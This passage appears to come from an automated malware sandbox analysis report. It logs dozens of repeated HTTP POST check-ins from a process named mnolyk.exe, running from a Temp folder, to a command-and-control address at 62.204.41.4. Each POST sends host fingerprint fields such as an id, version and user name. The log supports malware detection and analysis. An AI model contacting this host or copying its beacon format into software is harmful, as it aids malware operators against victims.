                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:59.441881895 CET831INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          677192.168.2.65040262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:59.613925934 CET831OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:59.676512003 CET832INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          678192.168.2.65040362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:59.851321936 CET832OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:59.915623903 CET833INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:59 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          679192.168.2.65040462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:00.112464905 CET833OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:00.177272081 CET834INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          68192.168.2.64978862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:09.765671968 CET188OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:09.828516006 CET188INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:09 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          680192.168.2.65040562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:00.344096899 CET834OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:00.406989098 CET835INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          681192.168.2.65040662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:00.598596096 CET835OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:00.665374994 CET836INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          682192.168.2.65040762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:00.848989964 CET836OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:00.911798954 CET837INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          683192.168.2.65040862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:01.096954107 CET838OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:01.162182093 CET838INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          684192.168.2.65040962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:01.334892035 CET839OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:01.399890900 CET839INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          685192.168.2.65041062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:01.580414057 CET840OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:01.644088030 CET840INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          686192.168.2.65041162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:01.821830034 CET841OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:01.885998964 CET841INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:01 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          687192.168.2.65041262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:02.064924955 CET842OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:02.131974936 CET842INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:02 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          688192.168.2.65041362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:02.323272943 CET843OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:02.387392998 CET843INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:02 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          689192.168.2.65041462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:02.595462084 CET844OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:02.658051968 CET844INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:02 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          69192.168.2.64978962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:10.000648975 CET189OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:10.064567089 CET189INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:10 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          690192.168.2.65041562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:02.837203026 CET845OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:02.900954962 CET845INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:02 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          691192.168.2.65041662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:03.085072994 CET846OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:03.150670052 CET846INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          692192.168.2.65041762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:03.329320908 CET847OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:03.391789913 CET847INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          693192.168.2.65041862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:03.565176010 CET848OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:03.629466057 CET848INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          694192.168.2.65041962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:03.800340891 CET849OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:04:03.865376949 CET849INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:04:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          695192.168.2.65042062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:04:04.035367012 CET850OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
